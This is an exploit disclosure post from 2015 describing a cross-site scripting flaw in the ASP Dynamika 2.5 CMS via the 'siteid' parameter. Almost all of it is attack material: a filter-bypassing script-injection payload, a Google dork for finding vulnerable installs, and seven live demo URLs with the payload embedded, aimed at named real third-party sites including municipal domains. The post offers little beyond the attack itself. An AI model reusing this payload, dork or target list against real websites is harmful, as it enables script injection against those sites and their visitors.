ASP Dynamika 2.5 Cross Site Scripting
Posted on 09 December 2015
###################### # Exploit Title : ASP Dynamika 2.5 Cross Site Scripting Vulnerability # Exploit Author : Persian Hack Team # Vendor Homepage : http://www.dynamika.co.il/ # Google Dork : "Powered By : Dynamika" # Date : 2015/12/08 # Version : 2.5 # ###################### # # Vulnerable Paramter siteid= # # Bypass '"--></style></scRipt><scRipt>alert(0xa)</scRipt> # # Demo: # #http://www.dynamika.co.il/dynamikadesign/home3.asp?siteid=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert%280xa%29%3C/scRipt%3E # #http://www.148.co.il/dynamikadesign/home3.asp?siteid=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert%280xa%29%3C/scRipt%3E # #http://www.sc-haifa.org/dynamikadesign/home3.asp?siteid=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert%280xa%29%3C/scRipt%3E # #http://www.kawkab.org.il/dynamikadesign/home3.asp?siteid=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert%280xa%29%3C/scRipt%3E # #http://www.carmelite.org.il/dynamikadesign/home3.asp?siteid=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert%280xa%29%3C/scRipt%3E # #http://www.fassuta.muni.il/dynamikadesign/home3.asp?siteid=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert%280xa%29%3C/scRipt%3E # #http://www.ibllin.muni.il/dynamikadesign/home3.asp?siteid=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert%280xa%29%3C/scRipt%3E # # # ###################### # Discovered by : # Mojtaba MobhaM (kazemimojtaba@live.com) # T3NZOG4N (t3nz0g4n@yahoo.com) ######################